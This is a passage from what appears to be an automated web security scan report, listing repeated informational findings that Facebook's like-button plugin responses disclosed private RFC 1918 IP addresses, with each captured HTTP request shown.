GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32f2e7a9c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.825. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.190.49

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a5a9414c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff8749c90c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.826. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.182.47

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3730c6874%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.827. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.213.32

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3fc8ffa4c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.828. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.198.59

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12cc5175c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32d786f84%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.829. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.147.61

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2a6ddc32%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2e1211308%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.830. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.240.47

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdf1fc9ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.831. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.78.43

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3816cd8fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.832. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.33.13.108

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa1cf26e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.833. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.62.43

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df775c6284%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.834. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.178.31

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5518899%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25942f924%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.835. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.103.30

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3e0633434%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff27f0385c4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.836. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.114.47

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19998486c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.837. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.128.112

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37cc8d578%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.838. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.63.126

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfce684c48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.839. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.24.38

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df340728c14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.840. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.226.44

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3f9538728%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff399bdf3c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.841. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.215.44

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df17d218344%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff19ecc276%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.842. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.123.43

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa16a6c14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a478987c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.843. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.178.53

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1de0d95bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff21d29845c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
